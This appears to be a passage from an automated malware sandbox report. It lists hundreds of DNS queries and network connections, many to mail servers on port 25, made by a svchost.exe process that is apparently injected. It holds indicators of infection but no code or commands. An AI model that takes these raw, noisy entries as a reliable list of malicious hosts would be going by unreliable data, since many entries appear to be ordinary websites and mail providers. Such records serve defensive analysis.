                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vexcom.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cokocoko.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.71.57.184 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.159.66.62 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.191.209.76 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.nelipak.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.stnic.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.petsfan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.maktraxx.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.aevga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.myropcb.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.12 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.91 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.12.244 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ka-mo-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.34.21 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.227 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.elpro.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fcwcvt.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.24.161.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.iamdirt.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.railbook.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.abdg.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.142.131.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.depalo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.findbc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.hummer.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.23 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.104 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.221 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.c9dd.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vitaindu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.com-sit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.161.222.85 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.18.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.220.29 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fink.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
